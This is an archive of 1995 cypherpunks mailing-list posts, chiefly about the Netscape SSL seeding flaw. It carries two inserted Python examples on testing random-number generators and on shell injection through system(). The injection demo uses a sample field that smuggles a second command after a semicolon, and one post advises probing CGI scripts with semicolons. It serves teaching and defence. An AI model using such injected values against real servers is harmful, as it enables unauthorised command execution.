To: cypherpunks@toad.com
Subject: SFChron
Message-ID: <199509191556.IAA09022@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


'Security Hole Found in Netscape Software'
C1.4 C4.1

	Choice quotes:

"But the breach raises the issue whether Netscape's software...will
ever be safe enough..."

"Mike Homer, vice president of marketing for Netscape, said that
recent breaches do not mean the products are flawed"

"But if Netscape thinks one patch is all it will take, they are
mistaken, said Sameer Parekh"

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Tue, 19 Sep 95 09:04:52 PDT
To: Eric Young <jsw@neon.netscape.com>
Subject: Verification of Random Number Generators
Message-ID: <v02110102ac849090d9fe@[17.255.9.110]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:20 9/19/95, Eric Young wrote:

>Now I had not noticed this, my library runs like a charm and things
>appear random from the random number generator.  This sort of error can
>only be checked by reading the code and specifically looking at critical
>routines like this the RNG seeding routines.  The advantage of my code
>being public is that some-one like Mike can have a look and pick up
>problems like this.
>The moral of the story I suppose is to be
>paranoid about checking routines relating to RNG.

Just an idle thought: it might be possible to do a probabilistic
verification of a RNG by sampling it over some number of samples, and
statistically analyzing the sample space. This would be analysis under the
model of "RNG as black box" as opposed to (or rather, if you're smart, in
addition to) code inspection & review. Any statisticians among us?

Erik Fair
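
The black-box sampling proposed in the message above, as an added example (not from the thread): two frequency tests run over generator output, set beside the quoted observation that a badly seeded generator still produces random-looking numbers. The generator is a constructed stand-in (SHA-256 in counter mode), not Netscape's or SSLeay's code, and the timestamp-plus-pid seed and the test thresholds are assumptions.

```python
"""Black-box frequency tests on a generator's output versus the size of
its seed space. Added illustration; all names and values are constructed."""
import hashlib
import math
import os
import struct

SAMPLE_BYTES = 64 * 1024


def keystream(seed, nbytes=SAMPLE_BYTES):
    """Stand-in generator: SHA-256(seed || counter), concatenated."""
    out = bytearray()
    counter = 0
    while len(out) < nbytes:
        out += hashlib.sha256(seed + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:nbytes])


def monobit_p_value(data):
    """Frequency test: are ones and zeros balanced across all bits?"""
    n = len(data) * 8
    ones = sum(bin(b).count("1") for b in data)
    s_obs = abs(2 * ones - n) / math.sqrt(n)
    return math.erfc(s_obs / math.sqrt(2))


def byte_chi_square(data):
    """Chi-square statistic of byte values against a uniform distribution."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    expected = len(data) / 256
    return sum((c - expected) ** 2 / expected for c in counts)


def passes_black_box(data):
    # 255 degrees of freedom: mean 255, standard deviation about 22.6.
    # The bounds are deliberately loose so that a sound generator
    # practically never fails this demonstration.
    return monobit_p_value(data) > 1e-6 and 130.0 < byte_chi_square(data) < 400.0


def seed_space_bits(window_seconds, pid_range):
    """Bits of uncertainty left if the seed is only a time and a pid."""
    return math.log2(window_seconds * pid_range)


# Constructed weak seed: a 32-bit timestamp and a 16-bit process id.
WEAK_SEED = struct.pack(">IH", 811468800, 1234)


def report():
    weak = keystream(WEAK_SEED)
    strong = keystream(os.urandom(32))
    stuck = bytes(b | 0x01 for b in strong)     # low bit stuck at 1
    return {
        "weak_seed": passes_black_box(weak),     # passes: output looks fine
        "strong_seed": passes_black_box(strong),
        "stuck_bit": passes_black_box(stuck),    # fails: real output bias
    }


if __name__ == "__main__":
    print(report())
    print("seed uncertainty, 1 hour x 32768 pids: %.1f bits"
          % seed_space_bits(3600, 32768))
```

The sampling catches a biased output stream but scores the weakly seeded generator the same as the well seeded one, so it complements a review of the seeding routine and does not replace it.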






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Tue, 19 Sep 95 19:07:17 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymous WWW proxies
Message-ID: <m0svEWz-00064DC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 17 Sep 95 at 11:24, Aleph One wrote:

> Points taken. But I believe there are (or will be) patches for CERN to
> do SSL. Check the SSLeay ssl-user mailing list.
 
> While we're talking about anonymous proxies. I always wanted to set up
> an IP anonymous proxy using Linux IP tunnel and maybe also IP
> Masquerading. This would allow people to have anonymous Web Servers,
> etc. (But as anything it would probably be abused for hacking, etc
> at no end). Any comments?

You can add a bit of protection for yourself to this, just some way 
of preventing the unwanted from using the service and terminating 
abusers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Tue, 19 Sep 95 19:13:01 PDT
To: cypherpunks@toad.com
Subject: Re: AOL monitoring
Message-ID: <m0svEca-00065qC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Sep 95 at 15:45, Thomas Grant Edwards wrote:

> On Sun, 17 Sep 1995, Sal Denaro wrote:
> 
> > 2) My .newsrc file can tell anyone that I read alt.hackers and
> > alt.2600
> 
> Hmmm...potential new crypto product...a "secure" newsreader with
> encrypted .newsrc? 

How hard is it to record downloaded newsgroups/msgs from the news
server? Here locally, I just found out that a group of local internet
providers use a centrally located NNTP server. 

Bummer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: keelings@wu1.wl.aecl.ca (S. Keeling)
Date: Tue, 19 Sep 95 07:28:57 PDT
To: cypherpunks@toad.com
Subject: Time release crypto
Message-ID: <9509191427.AA23942@wu1.wl.aecl.ca>
MIME-Version: 1.0
Content-Type: text/plain


Incoming from Stephen D. Williams:
> 
> What minimal requirements would be needed to support encrypted packets/files
> that a holder could only decrypt after a certain date/time?
> (Time Escrow?)

	How do you expect the system to reliably tell accurate time?
What's to stop anyone from just resetting the clock to get at what
they want?

	As always, physical access to the system breaks all security.

-- 

 "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
   keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 Sep 95 06:30:58 PDT
To: stewarts@ix.netcom.com
Subject: Unabomber ?
Message-ID: <199509191330.JAA13584@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill,


Both the Times and Post report that only the Post is publishing 
the FC-piece.


I'm scanning it now and will offer it in a while -- it's a 
long, long pole.


I'll ask by this post if someone wants to offer it FTP, I can 
only do multiple e-mail bites from this hole.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Sep 95 06:36:44 PDT
To: John Young <jya@pipeline.com>
Subject: Re: NYT on Netscape Crack
Message-ID: <199509191336.JAA14981@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 9/18/95 -0400, John Young wrote:
>   The New York Times, September 19, 1995, pp. A1, D21.
>
>
>   Security Flaw Is Discovered In Software Used in Shopping
>
>   By John Markoff

On the Front Page, *above* the fold.  Perhaps John was trying to make up for
being scooped by the WSJ on the SSL Crack story.

DCF

"The key to the age may be this, or that, or the other, as the young orators
describe; the key to all ages is-Imbecility; imbecility in the vast majority
of men, at all times, and, even in heroes, in all but certain eminent
moments; victims of gravity, custom, and fear." -- Ralph Waldo Emerson 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 19 Sep 95 06:49:50 PDT
To: sameer <sameer@c2.org>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190713.AAA01128@infinity.c2.org>
Message-ID: <199509191349.JAA04365@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



| 	Buffer overflow seems like a much greater concern when dealing
| with a server. Particularly one which is supposedly "secure", and
| accessing "secured" documents. Even with the server running as
| 'nobody' if someone can implement buffer overflow to get access to
| documents they shouldn't then that would count as a pretty significant
| hack.

	Don't forget system(), which was a major source of holes in the NCSA server.  
Also, CGI scripts, especially those that run under perl or sh, would be a good 
place to look for holes.  Don't forget to see what happens when you put 
semi-colons in the data field of various fields, such as mailto:'s.

Adam
-- 

"It is seldom that liberty of any kind is lost all at once."
					               -Hume
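
The system() problem raised in the message above, as an added example (not code from the NCSA server or from anyone in the thread): the same form field handed to a shell command line, passed as a single argv element, and validated first. The harmless echo command stands in for a mailer, and the function names, the address pattern and the sample field are assumptions.

```python
"""Why a form field must not reach system(): shell string versus argv.
Added illustration; all names and the sample input are constructed."""
import re
import subprocess

# Conservative pattern for an address field (an assumption for this demo).
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+")

# Constructed field value containing a semicolon.
SAMPLE_FIELD = "user@example.com; echo second-command-ran"


def deliver_shell(field):
    """Vulnerable form: what C's system("echo to=" + field) does.
    /bin/sh parses the whole string, so ';' ends the first command."""
    done = subprocess.run("echo to=" + field, shell=True,
                          capture_output=True, text=True)
    return done.stdout.splitlines()


def deliver_argv(field):
    """No shell: the field is one argv element and is never parsed."""
    done = subprocess.run(["echo", "to=" + field],
                          capture_output=True, text=True)
    return done.stdout.splitlines()


def deliver_checked(field):
    """Hardened form: validate the field, then pass it without a shell."""
    if not ADDRESS_RE.fullmatch(field):
        raise ValueError("field is not a plain address")
    return deliver_argv(field)


def is_rejected(field):
    """True if the hardened form refuses the field."""
    try:
        deliver_checked(field)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("shell  :", deliver_shell(SAMPLE_FIELD))    # two commands ran
    print("argv   :", deliver_argv(SAMPLE_FIELD))     # one literal argument
    print("checked:", "rejected" if is_rejected(SAMPLE_FIELD) else "accepted")
```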







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Sep 95 09:51:07 PDT
To: cypherpunks@toad.com
Subject: Why Surveillance State Needs Toy Crypto
Message-ID: <ac843be218021004b02f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:19 AM 9/19/95, Christian Wettergren wrote:
>What I don't understand is why the law-enforcement is so concerned
>about bruting things. It is probably quite easy to tap the keyboard,
>smart force, exchange the binary with the real thing etc for them?
>
>(Unless they want to read it all from a nice tipped-back armchair in
>a certain location? :-))
>
>What I'm saying is that this kind of attack should work quite easily
>in the one-by-one cases, but not on a large scale, malicious data,
>trojan horses, outright bugging. So why all this Clipper (son-of-X)
>fuss?

It's really about the threat model.

Sure, the authorities _could_ place microphones in offices and homes, but
this requires huge amounts of effort and is only justified when the target
is really, really important.

As Whit Diffie has said (and this makes about the fifth time I've credited
him on this, so I hope he's satisfied), widespread surveillance must attack
the communication channels, not just attack the origins and destinations.
That is, the _economics_ of mandating weak crypto are vastly more efficient
for the surveillance state.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Sep 95 09:51:14 PDT
To: cypherpunks@toad.com
Subject: Investing on Information We Get Here
Message-ID: <ac843ff11a021004a43e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:35 PM 9/19/95, Duncan Frissell wrote:
>At 11:00 PM 9/18/95 -0400, John Young wrote:
>>   The New York Times, September 19, 1995, pp. A1, D21.
>>
>>
>>   Security Flaw Is Discovered In Software Used in Shopping
>>
>>   By John Markoff
>
>On the Front Page, *above* the fold.  Perhaps John was trying to make up for
>being scooped by the WSJ on the SSL Crack story.

Also front page, above the fold, for the "San Jose Mercury News," the
newspaper of record of the Silicon Valley.

And CNBC is reporting the story on its hourly updates of the news.

(These computer lists are really great for investors! I heard about the
Apple problems a few days before they hit the street, and was able to
unload a bunch of shares at $45, a day before it dropped, now down to
around $36. "He who hesitates to act on inside information is lost.")

P.S. On Netscape, I've finally decided to do some buying. Sure, this latest
flaw is another embarrassment. But more deals and link-ups than ever are
being inked, and they've got the resources to really spruce up Navigator
and related products. I just don't see too many competitors on the horizon.

Actually, I was planning to buy some Netscape stock, now that the IPO froth
has settled. And since I have this info on the flaw, I _have_ to buy it,
else be guilty of "insider non-trading." As Stew Brownstein, a friend of
mine, has noted, if insider trading rules are interpreted logically, then
_failure_ to make a planned trade on the basis of insider information is
just as illegal as deciding to make some trade on the basis of insider
information. The SEC should require all insiders to file a daily report,
preferably before the market opens in NY, listing all of their planned
transactions for that day, so that violations of the "insider non-trading"
laws can be detected and prosecuted.

(Yes, I know that I am not an "insider" by SEC definitions. Poetic license.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 19 Sep 95 08:38:28 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <9509191537.AA00830@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


John Markoff in the NYT said:
>     The company said it would release a repaired version of the
>     software within a week.

Does this sound to anyone else like a pretty short amount of time to code and  
test a decent source of entropy for the PRNG?  <...and someone else said it  
should be out in a day or so!>

Jeff Weinstein writes:
>    Regardless of what Markoff implies, we do not intend to depend
>  on security through obscurity.

Oh, can we now expect to see source to at least the security portions of  
Navigator and the Commerce server?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Tue, 19 Sep 95 07:38:57 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190300.XAA05027@pipe4.nyc.pipeline.com>
Message-ID: <9509191438.AA16172@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>    The New York Times, September 19, 1995, pp. A1, D21.
...
>    Netscape officials said today that they would strengthen
>    the system, by making it significantly harder to determine
>    the random number at the heart of their coding system. They
>    said they would no longer disclose what data would be used
>    to generate the random numbers.

and from the WSJ article:

> "The information we were using to create the key is now a known set of
> information," said Jeffrey Treuhaft, security product manager for Netscape.

It sounds as if Netscape thinks that public knowledge of the key
generation is part of the problem.  I hope somebody on the security
team convinces management that entropy is more important than publicity.

(This could be a result of journalistic cluelessness, but it came up in
two independent articles.  It's enough to worry me.)

--
   Eli Brandt
   eli+@cs.cmu.edu
(back from a nice long mailing-list vacation -- it's nice to see that
 cpunks is still at the cutting edge.  for them what cares, I'm now
 a Ph.D. student at the CMU CS program...)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 19 Sep 95 07:49:51 PDT
To: rsalz@osf.org
Subject: Re: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <199509182322.QAA03984@comsec.com>
Message-ID: <9509191440.AA18495@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: Rich Salz <rsalz@osf.org>
>Date: Mon, 18 Sep 1995 13:11:46 -0400
>

>Would someone from outside the US try to download the above file?
>It would be, at least, amusing if an Air Force site were in violation
>of the ITAR (their README notwithstanding).

I know several people in the armed forces who are firmly on our side rather
than Freeh's or NSA's -- so I wouldn't find it amusing to get a USAF person
in trouble just because he/she is USAF.

 - Carl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Tue, 19 Sep 95 07:50:29 PDT
To: gnu@toad.com
Subject: Re: Intellectual Property and Crypto collision
In-Reply-To: <199509182307.QAA03892@comsec.com>
Message-ID: <9509191443.AA22130@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sun, 17 Sep 1995 13:20:06 -0700
>From: John Gilmore <gnu@toad.com>
>
>> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW
>> A presidential task force has recommended that electronic transmission of
[...]
>
>Would this make it illegal to produce tools for decrypting key-escrowed
>software?   :-)

Yup -- except you will have volunteered.

See the Feynman account (citation in
	http://www.clark.net/pub/cme/html/censor.html )

 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Sep 95 10:46:24 PDT
To: cypherpunks@toad.com
Subject: Mini-mailbombs and Warning Letters
Message-ID: <ac844fed1c0210046617@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(This is not about MIME, but the astute reader will see some parallels...)

I've received a couple of "automatically generated" pieces of e-mail which
tell me that, in the generator's opinion, something is wrong with my public
key, or it could not be found at the keyserver preferred by the owner of
the mail generator, etc.

Quoting from the latest: (identity of generator owner withheld)

"P.S.  This mail was composed by my mailreading sftwr, which
automatically scans incoming mail, looking for failed keyserver
requests, and prompts me whether it should automatically send this msg
on my behalf.  If there is a bug w this sftwr (for example, you never
PGP sign your msgs, so this entire msg makes no sense), or if you're
interested in the software itself (mail-secure.el: a package in lisp
for emacs; this is just one of the many crypto/privacy related things
it does) please mail the author of this package ( tjic@openmarket.com )
for details."

As the saying goes, "Sigh."

Being on a list with 700 subscribers, some of whom are running increasingly
sophisticated automatic checking agents, I foresee an increase in these
"warning letters" from their checking agents who feel posts are not
adequate in some way.

A minor issue, but symptomatic of trends.

I'm dealing with it the same way I'm dealing with the few people who have
something in their MIME setup that triggers my mailer (Eudora Pro 2.1) to
treat their text as attachments. Namely, by filtering them out.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Sep 95 08:31:38 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: (Yet Another?) Netscape Crack Web page
Message-ID: <199509191529.LAA14933@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:31 PM 9/19/95 +0200, Laurent Demailly wrote:
>
>I've been waiting to see here an announcement of some web page toward
>which direct ppl that want more infos on the great (congrats) job

Here are some URLs I've collected:


http://pauillac.inria.fr/~doligez/ssl/press-conf.html   SSL challenge virtual press conference
http://www.brute.cl.cam.ac.uk/users/pb/        Piete Brooks home page
http://dcs.ex.ac.uk/~aba/                      Adam Back's home page
http://dcs.ex.ac.uk/~aba/brutessl/             Index of /~aba/brutessl/
http://www.brute.cl.cam.ac.uk/brute/           brute page



DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Sep 95 08:29:34 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Hold a Cracking Party
Message-ID: <199509191529.LAA14949@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Just to let everyone know that I've got an assignment from Wired to do a
story with the above working title.

Since Wired is monthly it will be a feature rather than news but will give a
bit of an inside look at the process.

I will be hitting various people up for help and would appreciate it if you
send any URLs on the SSL and other such cracks to me.

DCF

"The freedom of the press belongs to the man who owns one."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Sep 95 11:34:23 PDT
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.D-G.3.91.950919135026.18165A-100000@dg.thepoint.net>
Message-ID: <199509191829.LAA09602@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Tue, 19 Sep 1995, Rev. Mark Grant wrote:
> 
> > On Sun, 17 Sep 1995, Brian Davis wrote:
> > 
> > > Phill obviously presents one point of view, vigorously and well.  What do 
> > > the rest of you think about a teen who, say, busts into a .edu site, 
> > > plays with the files, and ultimately brings the system down entirely for 
> > > 36 hours?  Fun and games?  Send him to his room, sans modem? Prosecute 
> > > him?  Have a TLA hire him???
> > 
> > If it wasn't for ITAR the Net would already have secure encryption and
> > authentication, and most such hacker attacks would be impossible (or at 
> > least impractical).
> > 
> > 		Mark
> 
> The non-responsive answer is stricken from the record.  :-)
> You mean "secure" as Netscape was secure from sameer et al.?
> 

	The first two hacks listed on my web page were made possible
because of ITAR. Without ITAR Netscape would not have been susceptible
to this attack.
	Two out of three fits my definition of "most".

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: descarte@mcqueen.com
Date: Tue, 19 Sep 95 03:37:34 PDT
To: cypherpunks@toad.com
Subject: Quick ITAR question....
Message-ID: <199509191040.LAA13613@alma.mcqueen.com>
MIME-Version: 1.0
Content-Type: text



I've just about finished the perl SSLeay implementation and I was musing
about how I would manage to do one for SSLref also.......

Here's the situation:

I'm in Britain, but I have access to a machine which I will develop on in the
States. Can I develop Net::SSLref on this machine?

My feeling is, no, since I'm not a US citizen ( does this matter with ITAR? ).
Similarly, it could be construed that the characters constituting the source
code are crossing the Atlantic to my machine here, albeit not being stored.
Conversely, I'm not reading *all* the code, so I couldn't necessarily
build SSLref from this action ( a parallel may be the export of 1/723 of
PGP in a .sig! )

Any comments would be much appreciated.

Thanks.

-- 
Alligator Descartes	| PGP Key available on request.
descarte@mcqueen.com	| http://www.mcqueen.com/hermetica



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 19 Sep 95 08:44:18 PDT
To: cypherpunks@toad.com
Subject: WebSTAR "challenge"
Message-ID: <v02120d04ac845d74a01c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


From TidBITS#295/18-Sep-95

>**This is a test. This is only a test.** The folks behind the book
>  _WebMaster_Macintosh_ have set up a contest to determine how
>  secure Macintosh web servers really are. They've put up a Web site
>  running WebSTAR with a "target" file that contestants must try to
>  retrieve. The first person to retrieve the file wins a year's
>  subscription to MacTech Magazine and a free pass to the next
>  WebEdge conference, and the next two people receive free WebEdge
>  passes. If the challenge of breaking WebSTAR's security isn't
>  sufficient, there's a second Mac connected to the first via
>  Ethernet. This second Mac doesn't run TCP/IP, only AppleTalk, and
>  holds a second target file; retrieving it wins you three free
>  WebEdge passes. The hope is that these tasks will prove
>  impossible, however, should someone break in, that's also useful
>  since it will help StarNine and Apple plug security holes. Contest
>  rules and details are at: [ACE]
>
>http://www.webmastermac.com/security/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Tue, 19 Sep 95 11:49:36 PDT
To: cypherpunks@toad.com
Subject: Crypto Sync Issue
Message-ID: <199509191846.LAA24272@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

I am interested in encrypting a SLIP link between my
PC (running Linux) and my Netcom shell account (running
SLIRP).

My question has to do with error conditions on the line.
If I drop a character or packet, the two sides will lose
crypto sync and result in things scrambled from then on.
The modems will fix most of the low level problems.
However, Murphy's Law has not been repealed. :)

Are there any standard methods to provide the SYNC between
the sender(encryption) and the receiver(decryption) on
an Async connection ? 

Since Slip uses IP packets, I was planning on an encryption
of the data portion of the IP packets (leaving the header
alone). 

Thanks,
Tom Rollins <kelso@netcom.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 19 Sep 95 08:49:43 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
In-Reply-To: <199509190703.DAA03247@clark.net>
Message-ID: <9509191548.AA17659@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I take a long term view of security. Basically I don't trust security software 
until it has been released in a stable condition for a few years.

The comments about Credit Card numbers miss the point. The volumes of trade on 
the Internet today are so small that the number of card numbers floating around 
is insignificant. There are much easier ways to find them than cracking the 
Internet. This will not be the case in a couple of years time where the trade 
volumes are far higher.

Visa and Mastercard will be coming out with a spec which will have very tight 
requirements for implementations.


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Tue, 19 Sep 95 08:53:18 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Fundamental Netscape hack
In-Reply-To: <199509190954.CAA24686@ix.ix.netcom.com>
Message-ID: <Pine.A32.3.91.950919105737.45409A-100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 19 Sep 1995, Bill Stewart wrote:

> Of course, one of the most serious security problems with Netscape servers
> is that they run on machines sitting out there on the Internet where
> anybody who can browse their services can attack them - that 128-bit
> bullet-proof iron-clad front door isn't much help if the garage door is
> unlocked because of some sendmail bug.  

Or- even easier yet- improper httpd installation or users who have not
been properly trained.  NCSA's default configuration file makes document
root a subtree.  One major institution I deal with regularly (and the
administrators should know better) changed the default setting, allowing
users to store html files in their home directory.  And, it seems, the
file permissions were too lax.  If a user had no index.html then I could
just cruise through their home directory, view most files and, in some
(inappropriate) cases, download them.  I told the administrator, and
mailed him a copy of a user's address book (she was a friend and knew what
I was doing before I did it).  The situation has changed and is now more
secure.  But I wonder how many other institutions have an inappropriate 
DocumentRoot so (I guess) users can have a "single home directory"?

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMF7nGKDthkLkvrK9AQEIbwQAl7k86Tk4gY/KU9JYS4lyI63fH4lJYTHw
+Pl85cx3M/RI/kO8N9ZaUih4Hh+8CnNl7xA6NWtURfcSuCCgW3mrdRbKT8KTW/3M
hohmv3yyyU2Ot24B4hb2/lZN5s/fR2JMdsWhKoZdm19xnlQIMBjidP6zxcavE/JC
GNbJm94mBIA=
=L0lD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 19 Sep 95 09:58:16 PDT
To: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Subject: Re: Verification of Random Number Generators
Message-ID: <9509191654.AA00901@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Just an idle thought: it might be possible to do a probabilistic
>  verification of a RNG by sampling it over some number of samples,
>  and statistically analyzing the sample space. This would be analysis
>  under the model of "RNG as black box" as opposed to (or rather, if
>  you're smart, in addition to) code inspection & review. Any
>  statisticians among us?

But this wouldn't have solved Netscape's problem.  Netscape was using a  
pretty good PRNG (the one in RSAREF).  The problem was they were/are using a  
naive method of seeding it.  The output of the PRNG would have been  
statistically random, but since the seed had ridiculously little entropy it  
was easy to guess.

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Tue, 19 Sep 95 08:25:27 PDT
To: jya@pipeline.com (John Young)
Subject: Re: Unabomber ?
In-Reply-To: <199509191330.JAA13584@pipe4.nyc.pipeline.com>
Message-ID: <m0sv50Y-0009yxC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


Yep, it's big.  26 sections, 232 paragraphs, 36 notes, and one diagram.
8 full newspaper pages in 5 column standard print (10 point?), ragged.

Read the first page before work.

> Bill,
> 
> 
> Both the Times and Post report that only the Post is publishing 
> the FC-piece.
> 
> 
> I'm scanning it now and will offer it in a while -- it's a 
> long, long pole.
> 
> 
> I'll ask by this post if someone wants to offer it FTP, I can 
> only do multiple e-mail bites from this hole.
> 

sdw



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 19 Sep 95 04:12:01 PDT
To: eay@mincom.oz.au
Subject: Re: NYT on Netscape Crack
Message-ID: <28592.9509191106@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Eric Young <eay@au.oz.mincom> writes:
> I will defend Netscape's code on the point about the RNG even though
> I have not seen any.  I assume the Netscape code is quite large and
> each release would have to pass various functionality tests.  How can
> you test that the RND seeding is wrong?  You have to actually look
> at the code, the number coming out are still random.  As of last
> week I was told by Mike_Spreitzer.PARC@xerox.com that the random
> number generator seed routine in my DES library was only copying in
> 4 bytes of passed data instead of 8.  Given des_cblock data;, it was
> 
> memcpy(init,data,sizeof(data));
> 
> it should have been
> 
